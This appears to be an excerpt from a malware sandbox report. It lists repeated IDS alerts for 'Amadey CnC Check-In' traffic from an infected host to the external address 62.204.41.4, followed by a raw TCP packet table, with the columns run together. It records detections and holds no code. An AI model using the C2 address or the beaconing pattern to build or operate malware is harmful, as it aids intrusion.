                          192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098TCP2027700ET TROJAN Amadey CnC Check-In5047680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774TCP2027700ET TROJAN Amadey CnC Check-In5045880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321TCP2027700ET TROJAN Amadey CnC Check-In5041780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892TCP2027700ET TROJAN Amadey CnC Check-In5040980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353TCP2027700ET TROJAN Amadey CnC Check-In5037180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178TCP2027700ET TROJAN Amadey CnC Check-In5044580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763TCP2027700ET TROJAN Amadey CnC Check-In5047880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570TCP2027700ET TROJAN Amadey CnC Check-In5043780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101TCP2027700ET TROJAN Amadey CnC Check-In5047380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652TCP2027700ET TROJAN Amadey CnC Check-In5046580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674TCP2027700ET TROJAN Amadey CnC Check-In5037680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465TCP2027700ET TROJAN Amadey CnC Check-In5040480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324TCP2027700ET TROJAN Amadey CnC Check-In5042780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.662.204.41.4
                          TimestampSource PortDest PortSource IPDest IP
                          Feb 7, 2023 20:00:50.777110100 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.777430058 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.836796045 CET804971862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.837024927 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.839792013 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.840023994 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.878460884 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.895771027 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.938014984 CET804971862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.942157030 CET804971862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.942238092 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.958383083 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.958431959 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.958585978 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.114259005 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.137717009 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.140268087 CET4972080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.176861048 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177059889 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177088976 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177117109 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177130938 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177145004 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177175045 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177175045 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177177906 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177192926 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177210093 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177238941 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177247047 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177269936 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177274942 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177303076 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177309036 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177328110 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177334070 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.177356005 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.177378893 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.197297096 CET804971862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.197442055 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.201834917 CET804972062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.202111006 CET4972080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.202652931 CET4972080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.239826918 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239861012 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239885092 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239897013 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.239913940 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239943981 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239953995 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.239972115 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.239974976 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.240003109 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.240024090 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.240024090 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.240047932 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.240068913 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.240072012 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.240104914 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.240139008 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.264234066 CET804972062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.268384933 CET804972062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.268486977 CET4972080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.302772045 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.302845001 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.302895069 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.302941084 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.302957058 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.302989006 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303020000 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303039074 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303060055 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303090096 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303095102 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303137064 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303142071 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303189039 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303189993 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303235054 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303235054 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303278923 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.303287029 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.303340912 CET4971980192.168.2.662.204.41.4
